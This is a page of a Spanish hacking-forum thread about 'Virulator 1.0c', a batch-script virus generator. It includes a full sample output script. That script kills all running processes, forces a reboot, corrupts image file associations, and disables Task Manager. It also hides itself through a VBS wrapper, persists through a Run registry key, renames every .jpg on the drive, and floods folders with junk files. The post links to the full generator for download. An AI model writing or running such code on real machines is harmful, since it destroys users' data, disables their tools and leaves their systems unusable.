elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Batch] Virulator 1.0c
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] Ir Abajo Respuesta Imprimir
Autor Tema: [Batch] Virulator 1.0c  (Leído 25,337 veces)
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.866



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #30 en: 11 Octubre 2012, 03:17 am »

Buf, cuantas cosas...

Virulator está un poco abandonado.

La imagen de "troyano bloqueado" es por algún código VBS que hay en el interior de virulator (No me he parado a mirar cual.)



@R4z3L.hax
Código:
REM Para ejecutar el bat en modo oculto:
REM Activar la siguiente linea manualmente...
REM Echo If not exist "%%TEMP%%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^^).Run """" ^^^& WScript.Arguments(0^^) ^^^& """", 0, False^>"%TEMP%\invisible.vbs" ^& wscript "%%TEMP%%\invisible.vbs" %%0) Else (Exit)>>"%FILE%"

algunas funciones necesitar que exista el archivo "invisible vbs", elimina las letras "REM" en la última linea.

@scalverth
Tienes razón, me apunto esa!

@тαптяαпсє
Gracias por la info

Un saludo


En línea



zonahurbana

Desconectado Desconectado

Mensajes: 178

RS, JC.


Ver Perfil WWW
Re: [Batch] Virulator 1.0c
« Respuesta #31 en: 15 Noviembre 2012, 04:09 am »

Gracias por todo este codigazo.
Tengo unas pocas preguntas ( ahora que me he animado por revisar un poco sobre esto  :silbar: )

¿.bat es la extensión de los programas escritos en Batch?

¿Por qué no se considera a Batch como un lenguaje de programación?
Es decir, ¿por qué está en la zona Scripting?

¿Este lenguaje no hace distinción entre mayúsculas y minúsculas en sus funciones verdad?

Gracias nuevamente . . .


En línea

Nunca dejar de aprender es importante, más allá del ritmo que se siga ...
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.866



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #32 en: 15 Noviembre 2012, 07:49 am »

Hola,

Gracias pero tus preguntas no son relacionadas con el aporte, debiste crear un nuevo tema...

Citar
¿.bat es la extensión de los programas escritos en Batch?
Sí. También pueden ser ".cmd" (No hay diferencia).

Citar
¿Por qué no se considera a Batch como un lenguaje de programación?
¿por qué está en la zona Scripting?
Porque es un lenguaje interpretado, como todos los de scripting... En cambio VB, C, Java, y todo el resto no necesitan un intérprete para su ejecución, ya que son compilados.

100% cierto es que Batch es un lenguaje de scripting, pero si lo diferencias con el resto de lenguajes de scripting puedes apreciar como haría falta añadir otro término a la lista solamente para apartar a Batch y dejarlo ahí, porque es el más limitado en todos los aspectos respecto a los otros...

Citar
¿Este lenguaje no hace distinción entre mayúsculas y minúsculas en sus funciones verdad?
Correcto.

Un saludo.

Porfavor no seguir haciendo preguntas que no tienen nada que ver con el post o lo acabaré cerrando.
En línea



Rr_bug32

Desconectado Desconectado

Mensajes: 102



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #33 en: 30 Noviembre 2012, 21:51 pm »

muY  Bueno!
En línea

....( . .)....
       -
desi

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #34 en: 1 Diciembre 2012, 12:37 pm »


gracias
VIRULATOR



By Elektro H@cker



Virulator es un creador de "virus" para los amantes de Batch.

Pueden crear un "virus" dañino, O un simple archivo para gastar una broma pesada (O no tán pesada).

Virulator tiene multitud de opciones y tareas variadas para añadirle a tu bomba, Además, En cada tarea hay la posibilidad de añadir tareas preconfiguradas (Y algunas son bastante divertidas xD)...
PD: No se pierdan la idea que se me ocurrió para "Que no pare de correr el reloj de windows!", Es mi tarea favorita XD, Pruebenlo, Eso deja loco a cualquiera y no es dañino :).



- Estas son las opciones principales:





- Estas son las tareas disponibles por el momento:

   

   



- También dispone de una opción para visualizar el historial de tareas, Para no perder de vista lo que vamos añadiendo...





- Esto es un ejemplo de un script generado con unas cuantas tareas de Virulator:

Código
  1. @Echo OFF
  2. Title sdsdsd
  3.  
  4. :: Virus creado con [Virulator 1.0]
  5. :: By Elektro H@cker
  6. :: No me hago repsonsable del uso de este archivo.
  7.  
  8. If not exist "%TEMP%\invisible.vbs" (Echo CreateObject("Wscript.Shell"^).Run """" ^& WScript.Arguments(0^) ^& """", 0, False>"C:\Users\ADMINI~1\AppData\Local\Temp\invisible.vbs" & wscript "%TEMP%\invisible.vbs" %0) Else (Exit)
  9.  
  10.  
  11. REM Matar proceso "explorer.exe"
  12. Taskkill /F /IM "explorer.exe" >NUL 2>&1
  13.  
  14.  
  15. REM Matar todos los procesos activos del sistema
  16. For /F "Tokens=4 delims=<>" %%X in ('wmic process get name /Format:xml ^| SORT ^| find /I ".exe" ^| Find /V /I "Taskkill" ^| Find /V /I "sort" ^| Find /V /I "cmd" ^| Find /V /I "csrss" ^| Find /V /I "conhost"') Do (Taskkill /F /T /IM "%%X" >NUL 2>&1)
  17.  
  18.  
  19. REM Programar el apagado del PC en 60 segundos
  20. Shutdown /R /T 60 /C "Soy Windows y me caes mal! No me vuelvas a encender, Noob..." /F >NUL
  21.  
  22.  
  23. REM Da¤ar las extensiones de archivos de imagen
  24. ASSOC .ani=regfile >NUL 2>&1
  25. ASSOC .bmp=regfile >NUL 2>&1
  26. ASSOC .cur=regfile >NUL 2>&1
  27. ASSOC .gif=regfile >NUL 2>&1
  28. ASSOC .ico=regfile >NUL 2>&1
  29. ASSOC .img=regfile >NUL 2>&1
  30. ASSOC .jpe=regfile >NUL 2>&1
  31. ASSOC .jpg=regfile >NUL 2>&1
  32. ASSOC .jpeg=regfile >NUL 2>&1
  33. ASSOC .pcd=regfile >NUL 2>&1
  34. ASSOC .png=regfile >NUL 2>&1
  35. ASSOC .psd=regfile >NUL 2>&1
  36. ASSOC .tga=regfile >NUL 2>&1
  37. ASSOC .tif=regfile >NUL 2>&1
  38. ASSOC .tiff=regfile >NUL 2>&1
  39.  
  40.  
  41. REM Abrir multi instancia "notepad.exe"
  42. Echo @echo off>>"%TEMP%\%~n0_720826398.bat"
  43. Echo :Instance>>"%TEMP%\%~n0_720826398.bat"
  44. Echo Start /B CMD /C "notepad.exe">>"%TEMP%\%~n0_720826398.bat"
  45. Echo Goto :Instance>>"%TEMP%\%~n0_720826398.bat"
  46. Start /B CMD /C "%TEMP%\%~n0_720826398.bat"
  47.  
  48.  
  49. REM Mostrar mensaje "Te voy a joder el PC, Lammer!"
  50. Echo X=msgbox("Te voy a joder el PC, Lammer!", 16,"Virus creado por Elektro H@cker")>"% style="color: #448888;">TEMP%\virulator.vbs"
  51. Start /B Wscript "%TEMP%\virulator.vbs"
  52.  
  53.  
  54. REM Bloquear pagina web "google.com"
  55. takeown /F "%windir%\System32\drivers\etc\hosts" >nul 2>&1
  56. icacls "%windir%\System32\drivers\etc\hosts" /grant "%username%":F /T >nul 2>&1
  57. Echo 127.0.1.1 google.com>>"%windir%\System32\drivers\etc\hosts"
  58. Echo 127.0.1.1 www.google.com>>"%windir%\System32\drivers\etc\hosts"
  59.  
  60.  
  61. REM Bucle infinito
  62. Echo @echo off>>"%TEMP%\%~n0_2514423018.bat"
  63. Echo :Bucle>>"%TEMP%\%~n0_2514423018.bat"
  64. Echo Echo bucleeeeeeeee >>"%TEMP%\%~n0_2514423018.bat"
  65. Echo Goto :Bucle>>"%TEMP%\%~n0_2514423018.bat"
  66. Start CMD /K "%TEMP%\%~n0_2514423018.bat"
  67.  
  68.  
  69. REM Ejecutar el virus al inicio del sistema "WindowsMachineSubProcess"
  70. Copy /Y %0 "%WINDIR%\" >NUL 2>&1
  71. Reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V "WindowsMachineSubProcess" /D "%WINDIR%\%~n0.bat" /F >NUL 2>&1  
  72.  
  73.  
  74. REM Modificar fecha de Windows (Bucle infinito secuencial)
  75. Echo :DateUP >"%TEMP%\DateUP.bat"
  76. Echo For /L %%%%a in (2000,1,2099) Do ( >>"%TEMP%\DateUP.bat"
  77. Echo For /L %%%%b in (1,1,12) Do ( >>"%TEMP%\DateUP.bat"
  78. Echo For /L %%%%c in (1,1,31) Do ( >>"%TEMP%\DateUP.bat"
  79. Echo Echo %%%%c/%%%%b/%%%%a ^| Date ^>NUL >>"%TEMP%\DateUP.bat"
  80. Echo ping -n 1 localhost >>"%TEMP%\DateUP.bat"
  81. Echo ) >>"%TEMP%\DateUP.bat"
  82. Echo ) >>"%TEMP%\DateUP.bat"
  83. Echo ) >>"%TEMP%\DateUP.bat"
  84. Echo Goto :DateUP >>"%TEMP%\DateUP.bat"
  85. Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\DateUP.bat"
  86.  
  87.  
  88. REM Modificar hora de Windows (Bucle infinito secuencial)
  89. Echo :TimeUP >"%TEMP%\TimeUP.bat"
  90. Echo For /L %%%%a in (0,1,23) Do ( >>"%TEMP%\TimeUP.bat"
  91. Echo For /L %%%%b in (0,1,59) Do ( >>"%TEMP%\TimeUP.bat"
  92. Echo Time %%%%a:%%%%b >>"%TEMP%\TimeUP.bat"
  93. Echo ping -n 1 localhost >>"%TEMP%\TimeUP.bat"
  94. Echo ) >>"%TEMP%\TimeUP.bat"
  95. Echo ) >>"%TEMP%\TimeUP.bat"
  96. Echo Goto :TimeUP >>"%TEMP%\TimeUP.bat"
  97. Start /B Wscript "%TEMP%\Invisible.vbs" "%TEMP%\TimeUP.bat"
  98.  
  99.  
  100. REM Modificar el nombre del Boot de inicio "Disco C: Infectado"
  101. label Disco C: Infectado>nul
  102.  
  103.  
  104. REM Renombrar extension ".jpg" a ".txt"
  105. FOR /R "%homedrive%\" %%X in (*.jpg) DO (Rename "%%X" "%%~nX.txt" >NUL 2>&1)
  106.  
  107.  
  108. REM Hibernar el PC
  109. RunDll32.exe powrprof.dll,SetSuspendState
  110.  
  111.  
  112. REM Deshabilitar el administrador de tareas (TASKMGR.EXE)
  113. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
  114. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >nul
  115.  
  116.  
  117. REM Intercambiar los botones del mouse
  118. Rundll32 User32.dll,SwapMouseButton
  119.  
  120.  
  121. REM Fake-Virus 1 "Fake25917820"
  122. (
  123. echo @echo off
  124. echo color 47
  125. echo net stop themes 2^>nul
  126. echo title INFECCION VIRAL PROFUNDA!
  127. echo echo INFECCION VIRAL!!!
  128. echo echo ERROR!!!
  129. echo echo virus - TROJAN_DEMOLISHER code #45643676
  130. echo PING -n 4 LOCALHOST ^>nul
  131. echo echo FIREWALL - FALLO
  132. echo PING -n 2 LOCALHOST ^>nul
  133. echo echo ANTI-VIRUS - FALLO
  134. echo PING -n 2 LOCALHOST ^>nul
  135. echo echo DIRECCION IP - RECHAZADA
  136. echo PING -n 2 LOCALHOST ^>nul
  137. echo echo FIRMA VIRAL: ****-****-****-8894
  138. echo PING -n 3 LOCALHOST ^>nul
  139. echo cls
  140. echo echo ESCANEANDO AREAS INFECTADAS...
  141. echo PING -n 3 LOCALHOST ^>nul
  142. echo set /a num=0
  143. echo :repeat1
  144. echo set /a num=%%num%%+1
  145. echo echo %%num%%
  146. echo if %%num%%==100 goto end
  147. echo goto repeat1
  148. echo :end
  149. echo PING -n 1 LOCALHOST ^>nul
  150. echo cls
  151. echo echo 86.5%%%% DE MEMORIA FISICA ESTA INFECTADA
  152. echo echo INFECCION FATAL!
  153. echo PING -n 3 LOCALHOST ^>nul
  154. echo ECHO LA ELIMINACION DEL DISCO INFECTADO ES NECESARIA
  155. echo PING -n 3 LOCALHOST ^>nul
  156. echo cls
  157. echo echo ELIMINANDO PARCIALMENTE EL DISCO INFECTADO [C:]
  158. echo echo PORFAVOR NO APAGUE EL SISTEMA
  159. echo PING -n 4 LOCALHOST ^>nul
  160. echo dir /b /s %%WINDIR%%\ ^| FIND /v /i "WINSXS" ^| FIND /v /i "assembly" ^| FIND /v /i "syswow64" ^| FIND /v /i "servicing"
  161. echo cls
  162. echo echo CONTENIDO DEL DISCO INFECTADO [C:] - ELIMINADO
  163. echo PING -n 3 LOCALHOST ^>nul
  164. echo cls
  165. echo echo ESCANEANDO...
  166. echo PING -n 2 LOCALHOST ^>nul
  167. echo set /a num1=0
  168. echo :repeat2
  169. echo set /a num1=%%num1%% +1
  170. echo echo %%num1%%
  171. echo if %%num1%%==100 goto end1
  172. echo goto repeat2
  173. echo :end1
  174. echo cls
  175. echo PING -n 2 LOCALHOST ^>nul
  176. echo echo 98.00%%%% DE MEMORIA FISICA HA SIDO DESINFECTADA
  177. echo PING -n 3 LOCALHOST ^>nul
  178. echo echo ERROR
  179. echo echo ERROR
  180. echo echo ERROR
  181. echo echo ERROR
  182. echo echo ERROR
  183. echo echo ERROR
  184. echo echo ERROR
  185. echo echo ERROR
  186. echo echo ERROR
  187. echo echo ERROR
  188. echo echo ERROR
  189. echo echo ERROR
  190. echo echo ERROR
  191. echo echo ERROR
  192. echo echo ERROR
  193. echo echo ERROR
  194. echo echo ERROR
  195. echo echo ERROR
  196. echo echo ERROR
  197. echo PING -n 3 LOCALHOST ^>nul
  198. echo cls
  199. echo title FALLO EN EL SISTEMA
  200. echo color 17
  201. echo echo ERROR!
  202. echo PING -n 2 LOCALHOST ^>nul
  203. echo echo MEMORIA VIRTUAL PERDIDA!
  204. echo PING -n 2 LOCALHOST ^>nul
  205. echo echo MEMORIA FISICA SOBRECALENTADA!
  206. echo PING -n 2 LOCALHOST ^>nul
  207. echo echo PROCESADOR SOBRECALENTANDOSE!
  208. echo PING -n 2 LOCALHOST ^>nul
  209. echo ECHO LA RUPTURA TOTAL DEL SISTEMA ES INMINENTE!
  210. echo PING -n 4 LOCALHOST ^>nul
  211. echo ECHO RIESGO DE FUEGO ENCONTRADO!
  212. echo ECHO APAGANDO EL SISTEMA PARA EVITAR PERDIDA DE DATOS
  213. echo shutdown /R /T 60 /C "Windows ha encontrado una amenaza de virus y debe reiniciarse. Guarde todo su trabajo ahora." /F
  214. echo PING -n 8 LOCALHOST ^>nul
  215. )>%TEMP%\Fake25917820.bat
  216. Start CMD /K %TEMP%\Fake25917820.bat
  217.  
  218.  
  219. REM Propagar 100 archicos en cada carpeta del disco duro (PRECONFIGURADO)
  220. (
  221. echo @echo off
  222. echo setlocal enabledelayedexpansion
  223. echo Set File=0
  224. echo For /F "Tokens=*" %%%%X in ('Dir /B /S /AD "%%systemdrive%%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"'^) do (Call :COPY %%%%X^)
  225. echo Fsutil file createnew "%%*\%%Random%%%%Random%%%%Random%%%%Random%%%%Random%%" 1 ^>NUL 2^>^&1
  226. echo Set /A File+=1
  227. echo If !FILE! EQU 100 (Set /A File=0^& Goto :EOF^) ELSE (Call :COPY %%*^)
  228. )>%TEMP%\basura.bat
  229. Start /B %TEMP%\basura.bat
  230.  



- Y por último, Aquí tienen el script:
Versión 1.0C
http://pastebin.com/raw.php?i=vqUN1g3p


(CASI)Todas las tareas han sido testeadas en Windows 7, Es muy posible que muchas tareas no funcionen en versiones anteriores de Windows (Y no tengo pensado ""dar soporte"" a esas versiones).

Opinen lo que quieran... Que a mi ya no se me ocurre que más tareas añadir :laugh:.

PD: Si encuentran algún fallo/mejora/idea reportenlo aquí para corregirlo/añadirlo porfavor  ;D.
Gracias.


Espero que os guste aunque séa un poco y lo disfruteis!
Salu2.
En línea

Páginas: 1 2 3 [4] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines